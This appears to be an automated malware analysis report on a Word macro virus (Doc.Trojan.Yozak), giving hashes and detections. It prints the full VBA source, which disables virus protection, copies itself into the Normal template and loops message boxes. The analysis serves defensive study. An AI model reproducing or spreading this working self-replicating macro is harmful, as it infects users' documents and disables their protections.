Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 56032532f3f8ba23…

MALICIOUS

Office (OLE)

31.0 KB Created: 1999-04-06 10:39:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: b2fe05bf62c9beb55a05ce6a7c1d2018 SHA-1: 31978fe5d825111fed6cdfd403b43667d786fb23 SHA-256: 56032532f3f8ba23f2c564bff55d1c6c2ae83f26272542074403cc9d297584a0
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document containing a VBA macro that executes upon opening. The macro attempts to disable virus protection and modify its own code, likely to evade detection or ensure execution. It also displays multiple message boxes with messages like 'Free Vic' and 'Legalize VXing', which are indicative of malware behavior.

Heuristics 3

  • ClamAV: Doc.Trojan.Yozak-4 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Yozak-4
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1248 bytes
SHA-256: 79626859e92e695b0f63e19a0e0a336fc85ba7a24e2d9ac60b1dea95d2faa9c3
Detection
ClamAV: Doc.Trojan.Yozak-3
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
Options.VirusProtection = False
Options.ConfirmConversions = False
Options.SaveNormalPrompt = False
Application.DisplayAlerts = wdAlertsNone
Application.EnableCancelKey = wdCancelDisabled
Dim ni As Boolean, ai As Boolean
If NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule.Lines(3, 3) = "Options.VirusProtection = False" Then ni = True
If ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule.Lines(3, 3) = "Options.VirusProtection = False" Then ai = True
x = VBE.ActiveVBProject.VBComponents("ThisDocument").CodeModule.Lines(1, 22)
If ni = True And ai = False Then
ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule.AddFromString x
ElseIf ni = False And ai = True Then
NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule.AddFromString x
End If
freevic:
MsgBox "Free Vic", vbCritical, "Stupid"
MsgBox "Free Vic Free Vic Free Vic"
MsgBox "Legalize VXing"
GoTo freevic
End Sub